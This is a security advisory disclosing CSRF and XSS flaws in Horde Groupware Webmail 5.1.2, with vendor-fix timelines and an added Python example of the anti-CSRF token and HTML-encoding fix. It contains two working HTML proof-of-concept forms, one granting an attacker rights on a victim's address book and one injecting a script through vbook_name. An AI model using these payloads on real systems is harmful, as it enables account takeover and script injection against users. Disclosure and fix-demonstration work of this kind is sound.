Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting

Posted Nov 4, 2013
Authored by Marcela Benetrix

Horde version 5.1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2013-6365, CVE-2013-6364
MD5 | 61a62e5a593fbb47e32c7273968288a7

#############################
Exploit Title: CSRF in Horde Groupware Webmail Edition
Author: Marcela Benetrix
Date: 10/28/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

#############################
Groupware Webmail Edition

Horde Groupware Webmail Edition is a free, enterprise-ready, browser-based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards-compliant components from the Horde Project.

##########################
CSRF Location

The share permission editing form (horde/services/shares/edit.php) was found to lack a unique anti-CSRF token. A forged cross-site POST submitted by a logged-in victim's browser can therefore grant another user read, edit and delete access to the victim's address book.


##########################
PoC
<html>
<body>
<!-- Forged cross-site POST to the share permission editor. The request carries the
     victim's Horde session cookie, so the victim must be logged in when the page loads.
     Replace www.victim.com, cid (share ID of the address book) and owner_input (the
     victim's username) with the values for the target. -->
<form action="http://www.victim.com/horde/services/shares/edit.php" method="POST">
  <input type="hidden" name="actionID" value="editform" />
  <!-- cid: share ID of the victim's address book -->
  <input type="hidden" name="cid" value="37" />
  <input type="hidden" name="app" value="turba" />
  <!-- owner_input: the victim's username -->
  <input type="hidden" name="owner_input" value="kenedyK" />
  <!-- Add the attacker's account to the share with read, edit and delete permissions -->
  <input type="hidden" name="u_names[||new_input]" value="AttackerUserName" />
  <input type="hidden" name="u_read[||new_input]" value="on" />
  <input type="hidden" name="u_edit[||new_input]" value="on" />
  <input type="hidden" name="u_delete[||new_input]" value="on" />
  <input type="hidden" name="g_names[||new]" value="" />
  <input type="hidden" name="save_and_finish" value="Save and Finish" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

Preconditions: the attacker must know the victim's username (the owner_input value) and the share ID of the target address book (the cid value), and the victim must be logged in to Horde in the browser that loads the attacker's page. Once he has these, he can launch the attack.

###########################
CVE identifier

CVE-2013-6365.
##########################
Vendor Notification
10/28/2013: Reported to the developers. They replied immediately and fixed the problem: http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
#############################

Exploit Title: XSS and CSRF in Horde Groupware Webmail Edition
Author: Marcela Benetrix
Date: 10/28/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

##########################
CSRF/XSS Location

The "Save search as a virtual address book" function of Turba (horde/turba/search.php) was found to be vulnerable to both CSRF and XSS: the form lacks an anti-CSRF token, and the vbook_name parameter accepts script, so a forged cross-site POST can create a virtual address book in the victim's account whose name carries a script payload.

##########################
PoC

<html>
<body>
<!-- Forged cross-site POST that saves an (empty) search as a virtual address book
     in the logged-in victim's account. The victim must be authenticated to Horde
     when the page loads; replace www.victim.com with the target host. -->
<form action="http://www.victim.com/horde/turba/search.php" method="POST">
  <input type="hidden" name="source" value="" />
  <input type="hidden" name="criteria" value="" />
  <input type="hidden" name="val" value="" />
  <input type="hidden" name="search" value="Search" />
  <!-- save_vbook: store the search as a virtual address book -->
  <input type="hidden" name="save_vbook" value="on" />
  <!-- vbook_name: the stored name is rendered unencoded, so it carries the XSS payload -->
  <input type="hidden" name="vbook_name" value="<script>alert(1)</script>" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
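Both reports above share one server-side root cause: a state-changing POST handler that accepts any request arriving with the victim's session cookie, and, in the Turba case, a user-supplied name that reaches an HTML sink unencoded. The following Python example is added here to illustrate the fix pattern for both; it is not Horde's code and does not reproduce Horde's actual patch. The server secret, the session IDs, the handler names and the form dictionaries are constructed for the example. It replays the hidden fields of the two PoC forms against hardened stand-in handlers and shows that both are rejected, that a token from another session is also rejected, and that the same request from the victim's own page (token included) succeeds with the vbook_name payload rendered inert.

```python
import hashlib
import hmac
import html
import secrets

# Constructed for this example: a per-deployment secret and a fixed victim
# session ID standing in for the real session store. Not Horde code.
SERVER_SECRET = secrets.token_bytes(32)
VICTIM_SESSION = "sess-victim-0001"


def issue_token(session_id: str, action: str) -> str:
    """Derive a CSRF token bound to one session and one form.

    Because the token is an HMAC over (session, action), a token the
    attacker obtains from their own session cannot be replayed into the
    victim's, and a token issued for one form cannot be reused on another.
    """
    msg = f"{session_id}:{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_token(session_id: str, action: str, presented) -> bool:
    """Constant-time comparison; a missing or non-string field is a failure."""
    if not isinstance(presented, str) or not presented:
        return False
    expected = issue_token(session_id, action)
    return hmac.compare_digest(expected.encode(), presented.encode())


def handle_shares_edit(session_id: str, form: dict) -> dict:
    """Hypothetical hardened stand-in for services/shares/edit.php.

    The vulnerable version applied the permission change from any origin;
    here it is applied only when the form carries the victim's own token.
    """
    if not verify_token(session_id, "shares_edit", form.get("csrf_token")):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    return {
        "status": 200,
        "share": form.get("cid"),
        "granted_to": form.get("u_names[||new_input]"),
        "perms": [p for p in ("read", "edit", "delete")
                  if form.get(f"u_{p}[||new_input]") == "on"],
    }


def handle_turba_search(session_id: str, form: dict) -> dict:
    """Hypothetical hardened stand-in for turba/search.php with save_vbook=on.

    Two fixes: the token check stops the cross-site save, and the virtual
    address book name is HTML-encoded at the point where it is rendered,
    so the <script> payload becomes inert text.
    """
    if not verify_token(session_id, "turba_search", form.get("csrf_token")):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    name = form.get("vbook_name", "")
    return {"status": 200, "html": "<li>%s</li>" % html.escape(name, quote=True)}


# The hidden fields of the two PoC forms, as the attacker's page would submit
# them: no csrf_token field, because the attacker cannot read the victim's.
POC_SHARES = {
    "actionID": "editform", "cid": "37", "app": "turba",
    "owner_input": "kenedyK",
    "u_names[||new_input]": "AttackerUserName",
    "u_read[||new_input]": "on", "u_edit[||new_input]": "on",
    "u_delete[||new_input]": "on",
    "g_names[||new]": "", "save_and_finish": "Save and Finish",
}
POC_VBOOK = {
    "source": "", "criteria": "", "val": "", "search": "Search",
    "save_vbook": "on", "vbook_name": "<script>alert(1)</script>",
}


def replay() -> dict:
    """Replay both PoCs, a PoC carrying an attacker-session token, and the
    same requests as the victim's own page would send them."""
    def with_token(form: dict, action: str, session_id: str = VICTIM_SESSION) -> dict:
        return {**form, "csrf_token": issue_token(session_id, action)}

    return {
        "poc_shares": handle_shares_edit(VICTIM_SESSION, POC_SHARES),
        "poc_vbook": handle_turba_search(VICTIM_SESSION, POC_VBOOK),
        "foreign_token": handle_shares_edit(
            VICTIM_SESSION, with_token(POC_SHARES, "shares_edit", "sess-attacker")),
        "legit_shares": handle_shares_edit(
            VICTIM_SESSION, with_token(POC_SHARES, "shares_edit")),
        "legit_vbook": handle_turba_search(
            VICTIM_SESSION, with_token(POC_VBOOK, "turba_search")),
    }


if __name__ == "__main__":
    for name, result in replay().items():
        print(name, result)
```

The token is derived rather than stored so the example needs no session table, but the essential properties are the same as for a stored random token: it is unreadable from another origin, bound to the victim's session, and compared in constant time. Note that the token check alone would have stopped the XSS in the second report only as delivered via CSRF; encoding vbook_name at the HTML sink is what removes the XSS itself.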


###########################
CVE identifier

CVE-2013-6364 was assigned for the combination of problems (the missing anti-CSRF token and the script injection via vbook_name) that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013: Reported to the developers. They replied immediately and fixed the problem: http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure
